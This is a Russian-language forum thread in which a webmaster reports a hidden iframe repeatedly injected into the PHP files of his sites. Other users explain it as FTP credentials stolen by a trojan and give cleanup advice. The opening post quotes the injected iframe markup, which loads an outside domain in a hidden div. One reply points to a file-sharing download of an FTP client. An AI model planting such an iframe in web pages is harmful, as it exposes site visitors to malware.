Странный код во всех сайтах - взлом?

12
ERROR_331
На сайте с 11.09.2008
Offline
14
2845

Заранее прошу прощения - если тема не соответствует ветке форума, более подходящего места не нашел. :(

Ситуация следующая. Есть хостинг, на нем штук 15 моих сайтов. Во все файлы index.php (и некоторых других файлов, тоже с расширением .php) был каким то образом вставлен следующий код:

<html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html>

Этот код останавливает работу сайтов - зловредный код. После того как код был удален из этих сайтов - он появлся снова и так каждые несколько минут после того как я удаляю его :(.

Этот код попал также в файлы скриптов, расположенных на хостинги, которые нельзя просто так запустить не зная правильного адресса. Делаю вывод что взломали хостинг.

Вопросы

1. Правильно ли что взломали хостинг?

2. Можно ли как то узнать откуда идет угроза?

3. Что можно сделать что бы опять все нормально работало?

4. Что вы можете сказать по этому поводу?

Заранее спасибо. :cool:

I
На сайте с 22.12.2008
Offline
86
iph
#1

Взлом мог быть откуда угодно, от угона паролей до уязвимостей в движке сайтов.

Проконсультируйтесь с вашим хостером, если вы на виртуале, нужно смотреть логи заходов по фтп\ссх, логи апача на предмет подозрительных конектов, проверить кронтабы и т.д.

iphosters.com (http://iphosters.com/) - шаред хостинг, впс, выделенные серверы, регистрация доменов us-express.net (http://us-express.net/) - любые товары из США
kxk
На сайте с 30.01.2005
Offline
970
kxk
#2

iph, +1 ............

Ваш DEVOPS
[Удален]
#3

Эта тема поднималась сотни раз уже. Никогда не храните пароли в FTP-клиентах. И никому не давайте так делать. Все пароли должны быть в голове, а не в компьютере.

С вероятностью 99,9% уверен, что это просто троян в компьютере вебмастера.

[Удален]
#4

+1

Либо используйте специализированный фтп-клиент CuteFTP.Pro, а не Total Commander и прочие пародии на клиенты фтп. CuteFTP.Pro является специализированным клиентом фтп, украсть пароль из него трояну будет крайне сложно.

Скачать этот клиент можно отсюда: http://astronomy.net.ua/rapidshare/856669

O
На сайте с 27.05.2008
Offline
42
ovm
#5

Первым делом смените пароль и проверьте комп на наличие троянов. Была подобная проблема, появлялся лишний код в индексных файлах. Причина была в наличии трояна на компе, который заливал этот зловредный код в момент соединения с сервером по FTP.

ovm добавил 13.03.2009 в 19:36

пока писал уже ответили

sumar
На сайте с 22.11.2005
Offline
140
#6

Вот еще бы кто посоветовал как себя заставить пользоваться другим фтп клиентом если всегда пользовался тоталкомандером :)

выделенные серверы - https://masterdedicated.com/ (https://masterdedicated.com/) доменные имена за приятную цену - только тут (https://masterdedicated.com/foru/announcements.php?id=2)
[Удален]
#7
astronomer:
+1

Либо используйте специализированный фтп-клиент CuteFTP.Pro, а не Total Commander и прочие пародии на клиенты фтп. CuteFTP.Pro является специализированным клиентом фтп, украсть пароль из него трояну будет крайне сложно.

Скачать этот клиент можно отсюда: http://astronomy.net.ua/rapidshare/856669

Так думают все пользователи CuteFTP пока у них не появляются вирусы на сайтах! :D

O
На сайте с 27.05.2008
Offline
42
ovm
#8
sumar:
Вот еще бы кто посоветовал как себя заставить пользоваться другим фтп клиентом если всегда пользовался тоталкомандером

А вы попробуйте. Тоталкомандер будете вспоминать как страшный сон.

AA
На сайте с 07.10.2007
Offline
86
#9

Определенно украли логин\пароль на фтп.

Был такой вирус на TotalCommander

Medice, cura te ipsum!
P
На сайте с 08.03.2007
Offline
250
#10

А к текущему разделу какое это имеет отношение?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий